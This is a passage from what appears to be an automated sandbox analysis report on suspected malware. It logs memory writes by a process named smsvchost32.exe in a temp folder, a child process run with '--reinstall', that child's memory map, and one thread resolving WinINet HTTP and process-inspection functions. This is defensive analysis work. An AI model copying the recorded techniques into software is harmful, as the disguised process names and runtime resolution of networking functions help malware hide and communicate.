| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700001, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700002, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700003, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700004, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700005, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700006, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700007, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700008, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700009, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70000a, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70000b, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70000c, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70000d, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70000e, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70000f, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700010, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700011, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700012, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700013, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700014, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700015, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700016, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700017, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700018, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700019, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70001a, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70001b, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70001c, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70001d, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70001e, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70001f, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700020, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700021, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700022, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700023, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700024, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700025, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700026, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700027, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700028, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700029, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70002a, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70002b, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70002c, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70002d, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70002e, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70002f, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700030, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700031, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700032, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700033, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700034, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700035, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700036, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700037, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700038, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x700039, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70003a, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70003b, size = 1 |
|
1 | |
| Modify Memory | #6: c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe | 0xf88 | address = 0x70003c, size = 1 |
|
1 |
Process #9: tmp8c77.tmp
266
0
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\users\nd9e1fyi\appdata\local\temp\tmp8c77.tmp |
| Command Line | "C:\Users\Nd9E1FYi\AppData\Local\Temp\tmp8C77.tmp" --reinstall |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:01:24, Reason: Child Process |
| Unmonitor | End Time: 00:01:29, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe6c |
| Parent PID | 0xdb0 (c:\users\nd9e1fyi\appdata\local\temp\smsvchost32.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
E68
0x
E64
0x
E5C
0x
928
0x
B70
0x
678
0x
83C
0x
F04
0x
838
0x
AC8
0x
AD4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00054fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| tmp8c77.tmp | 0x00400000 | 0x0043efff | Memory Mapped File | rwx |
|
|
|
|
| locale.nls | 0x00440000 | 0x004fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x005fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0064ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x0074ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000750000 | 0x00750000 | 0x00750fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x00761fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x00771fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000780000 | 0x00780000 | 0x00781fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000790000 | 0x00790000 | 0x00793fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007a0000 | 0x007a0000 | 0x007affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007b0000 | 0x007b0000 | 0x007b0fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000007c0000 | 0x007c0000 | 0x007c0fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000007d0000 | 0x007d0000 | 0x007dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x007d8fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x007d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x008dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008e0000 | 0x008e0000 | 0x00a67fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a70000 | 0x00a70000 | 0x00bf0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000c00000 | 0x00c00000 | 0x01ffffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002000000 | 0x02000000 | 0x02032fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002040000 | 0x02040000 | 0x0207ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002080000 | 0x02080000 | 0x0217ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002180000 | 0x02180000 | 0x02197fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002180000 | 0x02180000 | 0x02180fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002190000 | 0x02190000 | 0x02190fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x021a0000 | 0x021a3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000021b0000 | 0x021b0000 | 0x021bffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x021c0000 | 0x024f6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002500000 | 0x02500000 | 0x0253ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002540000 | 0x02540000 | 0x0263ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002640000 | 0x02640000 | 0x0273ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x0285ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002740000 | 0x02740000 | 0x0277ffff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db | 0x02780000 | 0x027c4fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x027d0000 | 0x027d3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000027e0000 | 0x027e0000 | 0x027e1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000027f0000 | 0x027f0000 | 0x027f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002800000 | 0x02800000 | 0x02800fff | Pagefile Backed Memory | rw |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000027.db | 0x02810000 | 0x02823fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002830000 | 0x02830000 | 0x02830fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002840000 | 0x02840000 | 0x02840fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002850000 | 0x02850000 | 0x0285ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002860000 | 0x02860000 | 0x0295ffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db | 0x02960000 | 0x029edfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000029f0000 | 0x029f0000 | 0x02deafff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002df0000 | 0x02df0000 | 0x02e2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002e30000 | 0x02e30000 | 0x02f2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f30000 | 0x02f30000 | 0x02f6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f70000 | 0x02f70000 | 0x0306ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003070000 | 0x03070000 | 0x030affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000030b0000 | 0x030b0000 | 0x031affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000031b0000 | 0x031b0000 | 0x031effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000031f0000 | 0x031f0000 | 0x032effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032f0000 | 0x032f0000 | 0x0332ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003330000 | 0x03330000 | 0x0342ffff | Private Memory | rw |
|
|
|
- |
| wow64win.dll | 0x55c00000 | 0x55c79fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x55c80000 | 0x55c87fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x55c90000 | 0x55cdffff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x6f830000 | 0x6fa3efff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x6fa40000 | 0x6fa55fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x6fa60000 | 0x6faf1fff | Memory Mapped File | rwx |
|
|
|
- |
| adsldpc.dll | 0x6fb00000 | 0x6fb37fff | Memory Mapped File | rwx |
|
|
|
- |
| odbc32.dll | 0x6fb40000 | 0x6fbd8fff | Memory Mapped File | rwx |
|
|
|
- |
| dsrole.dll | 0x6fbe0000 | 0x6fbe7fff | Memory Mapped File | rwx |
|
|
|
- |
| dsuiext.dll | 0x6fbf0000 | 0x6fc98fff | Memory Mapped File | rwx |
|
|
|
- |
| activeds.dll | 0x6fca0000 | 0x6fcdafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdsapi.dll | 0x6fce0000 | 0x6fcfbfff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x6fd00000 | 0x6fd17fff | Memory Mapped File | rwx |
|
|
|
- |
| odbctrac.dll | 0x6fd20000 | 0x6fd45fff | Memory Mapped File | rwx |
|
|
|
- |
| dsprop.dll | 0x6fd50000 | 0x6fd76fff | Memory Mapped File | rwx |
|
|
|
- |
| edputil.dll | 0x6fe90000 | 0x6fed8fff | Memory Mapped File | rwx |
|
|
|
- |
| efswrt.dll | 0x6fee0000 | 0x6ff50fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x6ff60000 | 0x6ff69fff | Memory Mapped File | rwx |
|
|
|
- |
| samcli.dll | 0x6ff70000 | 0x6ff84fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x6ff90000 | 0x6ff99fff | Memory Mapped File | rwx |
|
|
|
- |
| eappcfg.dll | 0x6ffa0000 | 0x6ffe9fff | Memory Mapped File | rwx |
|
|
|
- |
| pcacli.dll | 0x70010000 | 0x7001bfff | Memory Mapped File | rwx |
|
|
|
- |
| dpapi.dll | 0x70090000 | 0x70097fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x70190000 | 0x701b7fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x701e0000 | 0x701f8fff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x70210000 | 0x702aafff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x702b0000 | 0x704bcfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x704c0000 | 0x7063dfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x70b10000 | 0x70b84fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x71d30000 | 0x71d5efff | Memory Mapped File | rwx |
|
|
|
- |
| logoncli.dll | 0x72190000 | 0x721befff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x721f0000 | 0x724bafff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x72620000 | 0x7276afff | Memory Mapped File | rwx |
|
|
|
- |
| wintypes.dll | 0x74260000 | 0x74327fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x745e0000 | 0x74671fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74680000 | 0x74689fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74690000 | 0x746adfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x746c0000 | 0x7471efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x74720000 | 0x74763fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74770000 | 0x747b3fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x747c0000 | 0x7487dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74880000 | 0x74a3cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74aa0000 | 0x74b1afff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74b20000 | 0x74b64fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x74b70000 | 0x75068fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75070000 | 0x7511cfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75120000 | 0x7651efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x765a0000 | 0x7667ffff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x76680000 | 0x766d2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x766e0000 | 0x766eefff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76b60000 | 0x76bf1fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x76ec0000 | 0x76ef6fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76f00000 | 0x7704efff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x771d0000 | 0x772bafff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x772c0000 | 0x772c5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x772e0000 | 0x7730afff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77310000 | 0x77393fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x773a0000 | 0x773f7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77400000 | 0x7748cfff | Memory Mapped File | rwx |
|
|
|
- |
| netapi32.dll | 0x77490000 | 0x774a2fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x774c0000 | 0x7763dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77760000 | 0x7776bfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77810000 | 0x77956fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77960000 | 0x77adafff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc1562ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc15630000 | 0x7ffc157f0fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc157f1000 | 0x7ffc157f1000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Threads
Thread 0xe68
242
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = a杤畷獧汧晱摩湫p |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\eappcfg.dll, base_address = 0x6ffa0000 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x765a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77992bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x765b1ba0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x765c5eb0 |
|
1 | |
| Module | Get Handle | module_name = WININET.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = WININET.dll, base_address = 0x702b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x70351880 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x70357d00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x70351dc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersA, address_out = 0x7032c3f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x7037d200 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestA, address_out = 0x70378e60 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x703f0da0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x70337320 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersW, address_out = 0x7032bec0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x70378490 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestW, address_out = 0x70330fd0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\shlwapi.dll, base_address = 0x74b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindFileNameW, address_out = 0x74b37a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCatW, address_out = 0x74b484a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCpyW, address_out = 0x74b484e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpIW, address_out = 0x74b34750 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCpyNW, address_out = 0x74b433f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrA, address_out = 0x74b43570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrDupW, address_out = 0x74b39060 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x74b381b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrRChrW, address_out = 0x74b3d1c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpW, address_out = 0x74b35fe0 |
|
1 | |
| Module | Get Handle | module_name = PSAPI.DLL, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x772c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\psapi.dll, function = GetProcessImageFileNameA, address_out = 0x772c16a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77960000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = _chkstk, address_out = 0x779da570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlAllocateHeap, address_out = 0x77992bd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = RtlFreeHeap, address_out = 0x77990230 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = memset, address_out = 0x779dcfe0 |
|
1 | |
| Module | Get Handle | module_name = USERENV.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = USERENV.dll, base_address = 0x701e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\userenv.dll, function = CreateEnvironmentBlock, address_out = 0x701e4480 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\userenv.dll, function = GetProfilesDirectoryW, address_out = 0x701e45a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\userenv.dll, function = DestroyEnvironmentBlock, address_out = 0x701e4510 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ws2_32.dll, base_address = 0x746c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 52, address_out = 0x746f1110 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ws2_32.dll, function = 2, address_out = 0x746d3230 |
|
1 | |
